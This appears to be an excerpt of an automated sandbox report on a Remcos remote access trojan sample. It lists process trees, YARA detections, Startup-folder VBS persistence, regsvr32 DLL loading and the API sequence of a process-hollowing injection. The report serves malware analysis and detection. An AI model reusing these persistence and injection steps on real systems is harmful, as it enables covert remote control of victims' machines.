                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:false

                                  Target ID:18
                                  Start time:17:04:22
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:19
                                  Start time:17:04:24
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  Target ID:20
                                  Start time:17:04:24
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:21
                                  Start time:17:04:25
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  Target ID:22
                                  Start time:17:04:25
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:23
                                  Start time:17:04:26
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  Target ID:24
                                  Start time:17:04:26
                                  Start date:24/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
                                  Imagebase:0x7ff69b660000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:25
                                  Start time:17:04:31
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
                                  Imagebase:0x3b0000
                                  File size:147'456 bytes
                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:26
                                  Start time:17:04:36
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:27
                                  Start time:17:04:37
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:28
                                  Start time:17:04:37
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:29
                                  Start time:17:04:38
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  Target ID:30
                                  Start time:17:04:38
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:31
                                  Start time:17:04:39
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  Target ID:32
                                  Start time:17:04:40
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:33
                                  Start time:17:04:41
                                  Start date:24/04/2024
                                  Path:C:\Windows\winhlp32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\winhlp32.exe"
                                  Imagebase:0x3e0000
                                  File size:11'776 bytes
                                  MD5 hash:0629E6D130F226C009EA9AB329F37ACC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:87.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:96%
                                    Total number of Nodes:99
                                    Total number of Limit Nodes:0

                                    Callgraph

                                    Callgraph (rendered graph; the functions in the code regions at 0x05660000, 0x05E30000, 0x05EC0000 and 0x06230000 have the same structure: the entry at offset 0x0000 calls the functions at offsets 0x0054, 0x0419, 0x0420 and 0x0450, and 0x0450 in turn calls 0x0477 and 0x04AB)

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05660054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05660167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05660192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 056601C9
                                    • WriteProcessMemory.KERNELBASE ref: 05660217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 056602FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05660355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 056603A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 056603EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0566040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2085714208.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5660000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 2814188497-0
                                    • Opcode ID: 6c37c85a84e8279a60677376c82f02b3acf0ed10cbc80a7cd826076a0d8c9380
                                    • Instruction ID: ff2db664d8f925388ba3bea4533d2867b54223a2cee2628bc5844f6780834d4c
                                    • Opcode Fuzzy Hash: 6c37c85a84e8279a60677376c82f02b3acf0ed10cbc80a7cd826076a0d8c9380
                                    • Instruction Fuzzy Hash: A5C10A75784244FFE62667B08C1EF293B25DF46728F1482FDE2005F1E2C9A36821C76A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 06230054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 06230167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 06230192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 062301C9
                                    • WriteProcessMemory.KERNELBASE ref: 06230217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 062302FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 06230355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 062303A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 062303EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0623040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086265962.0000000006230000.00000040.00001000.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6230000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 2814188497-0
                                    • Opcode ID: 58c361fb1c5f3ea61c1f4ade8baf3aac4c4ad1124d0c6c02bf002179588a08bb
                                    • Instruction ID: 69484e00ec0bb580ee1d24925d311dd7da2318bcc3ecaeebe3ba7d6ef876833a
                                    • Opcode Fuzzy Hash: 58c361fb1c5f3ea61c1f4ade8baf3aac4c4ad1124d0c6c02bf002179588a08bb
                                    • Instruction Fuzzy Hash: 04C120B42A0254BFE6D977F0CC02F2937259F56708F1440A9EB616F1D1CBA29E12C772
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05EC0054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05EC0167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05EC0192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05EC01C9
                                    • WriteProcessMemory.KERNELBASE ref: 05EC0217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 05EC02FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05EC0355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05EC03A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 05EC03EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 05EC040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086080945.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5ec0000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 2814188497-0
                                    • Opcode ID: 042cc396625a3de1e1ea30ef02463d81bfc26d4ecd8002fd453107bc9edaa789
                                    • Instruction ID: 189fa3a83f4efe9bbac18edc106125c833674b78ffe2567ec7682e79b436bb8e
                                    • Opcode Fuzzy Hash: 042cc396625a3de1e1ea30ef02463d81bfc26d4ecd8002fd453107bc9edaa789
                                    • Instruction Fuzzy Hash: 91C1FD75790244FFE61577B19D4EF2E3B25BF46708F1490EDF2806F1D2C9A2A8128662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05E30054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05E30167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05E30192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05E301C9
                                    • WriteProcessMemory.KERNELBASE ref: 05E30217
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086042644.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5e30000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$AllocCreateMemorySectionUnmapViewVirtualWrite
                                    • String ID:
                                    • API String ID: 1599469609-0
                                    • Opcode ID: b190c6a758137c1d7ea5d11a36c2aa9f4efeb2f819fbe902bbe22a0fb9214416
                                    • Instruction ID: 9224222a5aaf46d24b40c735f227a11d15e553e2d1beac5b2f6af7dd3be2670b
                                    • Opcode Fuzzy Hash: b190c6a758137c1d7ea5d11a36c2aa9f4efeb2f819fbe902bbe22a0fb9214416
                                    • Instruction Fuzzy Hash: 9DB12D75790204BFE71977F1DC0FF2937259F86B08F1090A9E2816F1E1C9A2AA21C662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05E30420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05E30083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05E3043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05E30167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05E30192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05E301C9
                                    • WriteProcessMemory.KERNELBASE ref: 05E30217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 05E302FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05E30355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05E303A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 05E303EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 05E3040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086042644.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5e30000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: 5be675c49af8cc823581b7f01f74d48a4ed046ce3aaf9cce9a0cda4282e32c8d
                                    • Instruction ID: ffeb67ec9c09f2d767d72367c481024b2f2616faa527bd50bd9b6e719c2b6875
                                    • Opcode Fuzzy Hash: 5be675c49af8cc823581b7f01f74d48a4ed046ce3aaf9cce9a0cda4282e32c8d
                                    • Instruction Fuzzy Hash: 16B1DB74790204BFE7197BF1DC4FF2937259F85B0CF209169E2816F1E1C9A2AE21D662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 06230420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,06230083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0623043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 06230167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 06230192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 062301C9
                                    • WriteProcessMemory.KERNELBASE ref: 06230217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 062302FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 06230355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 062303A1
